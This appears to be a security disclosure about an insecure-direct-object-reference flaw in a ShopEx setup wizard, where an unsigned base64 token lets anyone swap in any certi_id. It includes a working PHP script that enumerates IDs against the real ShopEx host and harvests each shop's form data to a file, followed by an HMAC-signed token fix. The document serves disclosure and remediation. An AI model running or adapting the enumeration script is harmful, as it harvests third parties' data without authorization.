Brief description:
A flaw in one ShopEx interface allows every site that uses ShopEx to be enumerated.
Details:
The problem is in the ShopEx store setup wizard page

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

The refer parameter base64-decodes to {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

The token is nothing more than base64 of a JSON object: it carries no signature, and the server uses whatever certi_id the client puts in it. Changing certi_id is therefore enough to walk through every website that runs the ShopEx program. The script below does exactly that: it iterates certi_id values and dumps the form fields the wizard page returns for each one.
<?php
// Fetch the wizard page for one certi_id and dump the text inputs it returns.
function ShowshopExD($cid) {
    $url = 'http://guide.ecos.shopex.cn/step2.php';

    // refer is plain base64(JSON); nothing binds certi_id to the caller,
    // so any value can be substituted here.
    $refer = base64_encode('{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}');
    $url = $url . '?refer=' . $refer;

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    $result = curl_exec($ch);
    curl_close($ch);

    if ($result === false) {
        return; // request failed, nothing to parse
    }

    // Convert to GB2312 so the output reads correctly in a Chinese Windows console.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // The page echoes the refer token back when the certi_id is valid.
    if (strpos($result, $refer) !== false) {
        $fp = fopen("c:/shopEx.txt", 'ab'); // append results to a file

        // Pull every <input type="text" ... /> and print its name/value pair.
        preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
        foreach ($value[1] as $key) {
            if (!preg_match('/name="(.*?)"(.*?)value="(.*?)"/', trim($key), $res)) {
                continue; // input without a name/value pair
            }
            $col = $res[1] . ':' . $res[3] . "\r\n";
            echo $col;
            fwrite($fp, $col, strlen($col));
        }

        echo '--------------------------------' . "\r\n";
        fclose($fp);
    }
    flush();
}

for ($i = 1; $i < 10000; $i++) { // enumerate certi_id values
    ShowshopExD($i);
}
?>
Proof of concept:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
The refer parameter was switched to a different encryption scheme.
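The fix note above says refer was switched to another encryption scheme. As an added example (not ShopEx code and not part of the original report), the PHP below contrasts the original unsigned base64 token, which the enumeration script above forges by editing one field, with an HMAC-signed, expiring token that the server verifies before it uses certi_id. The secret key, the token layout body.mac, and the legacy_* / signed_* function names are assumptions made for this illustration.

```php
<?php
// Added example, not ShopEx code. Assumptions: $KEY is a secret held only on the
// server, and the body.mac token layout is our own design for this illustration.

// --- Original scheme: base64(JSON). Nothing binds certi_id to anyone. ---
function legacy_make_refer(int $certiId, string $callbackUrl): string {
    // json_encode escapes slashes by default, giving the http:\/\/ form seen on the page
    return base64_encode(json_encode(['certi_id' => $certiId, 'callback_url' => $callbackUrl]));
}

function legacy_parse_refer(string $token): ?array {
    $json = base64_decode($token, true);
    $data = $json === false ? null : json_decode($json, true);
    return is_array($data) ? $data : null;
}

// Forging a token for any other certi_id is decode, edit, re-encode.
function legacy_forge(string $token, int $newCertiId): ?string {
    $data = legacy_parse_refer($token);
    if ($data === null) {
        return null;
    }
    $data['certi_id'] = $newCertiId;
    return base64_encode(json_encode($data));
}

// --- Hardened scheme: HMAC-SHA256 over the payload, verified before use. ---
function b64url(string $raw): string {
    return rtrim(strtr(base64_encode($raw), '+/', '-_'), '=');
}

function b64url_decode(string $enc): ?string {
    $enc = strtr($enc, '-_', '+/');
    $raw = base64_decode($enc . str_repeat('=', (4 - strlen($enc) % 4) % 4), true);
    return $raw === false ? null : $raw;
}

function signed_make_refer(int $certiId, string $callbackUrl, string $key, int $ttl = 600): string {
    $payload = json_encode([
        'certi_id'     => $certiId,
        'callback_url' => $callbackUrl,
        'exp'          => time() + $ttl,   // short lifetime limits replay
    ]);
    $body = b64url($payload);
    $mac  = b64url(hash_hmac('sha256', $body, $key, true));
    return $body . '.' . $mac;
}

function signed_parse_refer(string $token, string $key): ?array {
    $parts = explode('.', $token, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$body, $mac] = $parts;
    $expected = b64url(hash_hmac('sha256', $body, $key, true));
    // constant-time comparison so the MAC cannot be guessed byte by byte
    if (!hash_equals($expected, $mac)) {
        return null;
    }
    $json = b64url_decode($body);
    $data = $json === null ? null : json_decode($json, true);
    if (!is_array($data) || !isset($data['certi_id'], $data['exp']) || $data['exp'] < time()) {
        return null;
    }
    return $data;
}

// --- Demonstration with constructed values ---
$KEY = 'replace-with-a-random-server-side-secret';   // assumption: server-only secret

$legacy = legacy_make_refer(1051, 'http://www.joyogame.net/');
$forged = legacy_forge($legacy, 1052);
echo "legacy token for 1051: $legacy\n";
echo "forged for 1052:       $forged  accepted? ", legacy_parse_refer($forged) ? "yes" : "no", "\n";

$signed = signed_make_refer(1051, 'http://www.joyogame.net/', $KEY);
echo "signed token:          $signed\n";

// Tamper the same way the enumeration script does: edit certi_id in the body.
[$body, $mac] = explode('.', $signed, 2);
$data = json_decode(b64url_decode($body), true);
$data['certi_id'] = 1052;
$tampered = b64url(json_encode($data)) . '.' . $mac;

echo "genuine accepted?  ", signed_parse_refer($signed, $KEY) ? "yes" : "no", "\n";
echo "tampered accepted? ", signed_parse_refer($tampered, $KEY) ? "yes" : "no", "\n";
```

Run it with php from the command line. The design point: any encoding, however unusual, is reversible by whoever can read one token, so swapping base64 for a different scheme only slows the script above down. The server gains something only when it can check that it issued the token (the MAC and expiry) and, beyond that, that the certi_id inside belongs to the session making the request rather than returning another shop's data on the strength of a client-supplied identifier.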